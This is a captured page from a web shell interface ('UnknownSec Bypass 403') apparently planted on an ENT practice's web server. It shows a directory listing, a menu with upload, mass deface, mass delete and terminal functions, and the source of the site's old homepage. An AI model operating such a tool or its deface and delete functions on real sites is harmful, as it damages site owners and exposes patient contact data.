UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
indexOld.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>ENT Doctor</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 0; background-color: #f4f4f4; } .container { max-width: 800px; margin: 20px auto; padding: 20px; background-color: #fff; border-radius: 5px; box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1); } h1, h2 { color: #333; } p { line-height: 1.6; margin-bottom: 15px; } form { margin-top: 20px; } label { display: block; margin-bottom: 5px; } input[type="text"], input[type="email"], textarea { width: 100%; padding: 8px; margin-bottom: 10px; border: 1px solid #ccc; border-radius: 4px; box-sizing: border-box; } input[type="submit"] { background-color: #4CAF50; color: white; padding: 10px 20px; border: none; border-radius: 4px; cursor: pointer; } input[type="submit"]:hover { background-color: #45a049; } </style> </head> <body> <div class="container"> <h1>ENT Doctor</h1> <p>Welcome to the website of Dr. Saima Azim, ENT Specialist.</p> <h2>About Dr. Saima Azim</h2> <p>Dr. Saima Azim is a board-certified ENT specialist with years of experience in diagnosing and treating ear, nose, and throat conditions. He is dedicated to providing personalized care to each patient.</p> <h2>Services Offered</h2> <ul> <li>Ear infections</li> <li>Nasal congestion</li> <li>Throat pain</li> <li>Hearing loss</li> <li>Sinusitis</li> <li>And more...</li> </ul> <h2>Contact Us</h2> <form action="contact.php" method="post"> <label for="name">Name:</label> <input type="text" id="name" name="name" required> <label for="email">Email:</label> <input type="email" id="email" name="email" required> <label for="message">Message:</label> <textarea id="message" name="message" rows="4" required></textarea> <input type="submit" value="Submit"> </form> </div> </body> </html>
Copyright © 2025 - UnknownSec